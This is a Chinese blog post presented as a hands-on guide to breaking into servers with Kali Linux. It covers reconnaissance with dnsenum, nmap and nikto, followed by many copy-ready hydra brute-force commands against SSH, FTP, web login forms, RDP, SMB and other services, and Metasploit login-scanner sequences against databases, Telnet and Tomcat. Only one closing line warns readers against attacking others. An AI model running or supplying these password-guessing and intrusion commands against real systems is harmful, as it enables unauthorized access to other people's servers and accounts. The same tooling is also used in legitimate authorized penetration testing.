• kali入侵服务器的那一套实战


    dnsenum  -enum       xxxxx.com    枚举出网站的所有域名和服务器的ip地址

    打开百度查询ip地址的所在地

    whatweb  xxxx.com  查看那些网站入口可以访问   以状态码为准

    whois  ip地址  查看ip所在地

    nmap -sS     ip           匿名查看服务器开放的端口

    nmap  -O或-A  查看服务器的什么系统

    nmap -sV  查看服务器开放端口以及服务器版本

    [nikto]

    漏洞扫描
    -T 选项包含了许多小选项,-T 9 表示扫描sql注入漏洞
    0检查文件上传页面
    1检查web日志
    2检查错误配置或默认文件
    3检查信息泄露问题
    4检查XSS/Script/Html问题
    5从根目录检查是否存在可访问的文件
    6检查拒绝服务器问题
    7从任意文件检索是否存在可访问文件
    8检查是否存在系统命令执行漏洞
    9检查sql注入漏洞
    b识别安装的软件版本
    c检查源代码泄露问题
    x反向链接选项

    nikto  -h  ip    普通扫描全部漏洞

    nikto -h  -h  ip  -p 端口号       扫描指定端口漏洞

    nikto -h ip -C all  all表示CGI目录猜解

    nikto -h ip  -T 9  扫描sql注入漏洞

    知道漏洞后开始爆破

    [hydra(九头蛇)]

    -l 指定爆破帐号
    -w 指定每个县城的回应时间为10
    -P 指定密码字典
    -t 指定爆破线程
    -v 指定现实爆破过程
    -f 查找到第一个可以使用的id和密码的时候停止破解
    hydra -l root -w 10 -P passwd.txt -t 10 -f ip地址 ssh
    hydra -L /home/chenglee/zidian/user.txt -P /home/chenglee/zidian/wordlist.TXT 192.168.137.133 mysql
    hydra -L user.txt -P pass.txt -V -t 10 ssh://192.168.0.1:22
    暴力破解:
    参数:
    -R 继续从上一次进度接着破解
    -S 大写,采用SSL链接
    -s 小写,可通过这个参数指定非默认端口
    -l 指定破解的用户,对特定用户破解
    -L 指定用户名字典
    -p 小写,指定密码破解,少用,一般是采用密码字典
    -P 大写,指定密码字典
    -e 可选选项,n:空密码试探,s:使用指定用户和密码试探
    -C 使用冒号分割格式,例如“登录名:密码”来代替-L/-P参数
    -M 指定目标列表文件一行一条
    -o 指定结果输出文件
    -f 在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
    -t 同时运行的线程数,默认为16
    -w 设置最大超时的时间,单位秒,默认是30s
    -v /-V显示详细过程

    各协议的具体命令:
    格式+示例:

    1、破解ssh:
    hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
    hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

    2、破解ftp:
    hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
    hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

    3、get方式提交,破解web登录:
    hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

    4、post方式提交,破解web登录:
    hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
    hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
    参数说明:
    -t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
    10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示

    5、破解https:
    hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
    6、破解teamspeak:
    hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak

    7、破解cisco:
    hydra -P pass.txt 10.36.16.18 cisco
    hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

    8、破解smb:
    hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb

    9、破解pop3:
    hydra -l muts -P pass.txt my.pop3.mail pop3

    10、破解rdp:
    hydra ip rdp -l administrator -P pass.txt -V

    11、破解http-proxy:
    hydra -l admin -P pass.txt http-proxy://10.36.16.18
    -------------------------------------------------------------------
    Kali Linux(Metasploit口令猜解模块)

    Metasploit口令猜解模块——

    SSH服务口令猜解:

    msf > use auxiliary/scanner/ssh/ssh_login(使用ssh_login模块)

    msf auxiliary(ssh_login) > show options (查看选项)

    msf auxiliary(ssh_login) > set RHOSTS 10.107.0.99(目标)

    msf auxiliary(ssh_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(ssh_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(ssh_login) > set THREADS 50(线程)

    msf auxiliary(ssh_login) > exploit (开始)

    Telnet口令猜解:

    msf > use auxiliary/scanner/telnet/telnet_login (使用telnet_login模块)

    msf auxiliary(telnet_login) > show options (查看选项)

    msf auxiliary(telnet_login) > set RHOSTS 10.180.100.141(目标)

    msf auxiliary(telnet_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(telnet_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(telnet_login) > exploit (开始)

    Samba口令猜解:

    msf > use auxiliary/scanner/smb/smb_login (使用smb_login模块)

    msf auxiliary(smb_login) > show options (查看选项)

    msf auxiliary(smb_login) > set RHOSTS 10.180.100.10(目标)

    msf auxiliary(ssmb_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(ssmb_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(ssmb_login) > exploit(开始)

    Mysql口令猜解:

    msf > use auxiliary/scanner/mysql/mysql_login (使用mysql_login模块)

    msf auxiliary(mysql_login) > show options (查看选项)

    msf auxiliary(mysql_login) > set RHOSTS 192.168.230.176(目标)

    msf auxiliary(mysql_login) > set USERNAME root(用户名字典,或指定用户)

    msf auxiliary(mysql_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(mysql_login) > exploit(开始)

    Postgresq口令猜解:

    msf > use auxiliary/scanner/postgres/postgres_login (使用postgres_login模块)

    msf auxiliary(postgres_login) > show options (查看选项)

    msf auxiliary(postgres_login) > set RHOSTS 192.168.230.10(目标)

    msf auxiliary(postgres_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(postgres_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(postgres_login) > exploit (开始)

    Mssql口令猜解:

    msf > use auxiliary/scanner/mssql/mssql_login (使用mssql_login 模块)

    msf auxiliary(mssql_login) > show options (查看选项)

    msf auxiliary(mssql_login) > set RHOSTS 10.107.0.64(目标)

    msf auxiliary(mssql_login) > set USER_FILE /root/username.txt(用户名字典,或指定用户)

    msf auxiliary(mssql_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(mssql_login) > exploit(开始)

    Tomcat口令猜解:

    msf > use auxiliary/scanner/http/tomcat_mgr_login (使用tomcat_mgr_login模块)

    msf auxiliary(tomcat_mgr_login) > show options(查看选项)

    msf auxiliary(tomcat_mgr_login) > set RHOSTS 192.168.230.176(目标)

    msf auxiliary(tomcat_mgr_login) > set USER_FILE username.txt(用户名字典,或指定用户)

    msf auxiliary(tomcat_mgr_login) > set PASS_FILE /root/pass.txt(密码字典文件)

    msf auxiliary(tomcat_mgr_login) > exploit(开始)

    hydra  -l   root   -P  /password.txt -vV  -t 10 -f  ip   ssh

    也可以写一个python脚本爆破

    隆重声明注意自己的行为,不要搞别人,人外有人,天外有天!

  • 相关阅读:
    sql server 查询出的结果集,拼接某一列赋值给一个变量
    sql server显示某一列中有重复值的行
    webservice 尝试加载 Oracle 客户端库时引发 BadImageFormatException。如果在安装 32 位 Oracle 客户端组件的情况下运行,将出现此问题
    Merge Into 用法
    修改TFS与本地源代码映射路径
    Thinkphp5.0第五篇
    aircrack-ng wifi密码破解
    Thinkphp5.0第四篇
    Thinkphp5.0第三篇
    Thinkphp5.0第二篇
  • 原文地址:https://www.cnblogs.com/duanlinxiao/p/11910370.html
Copyright © 2020-2023  润新知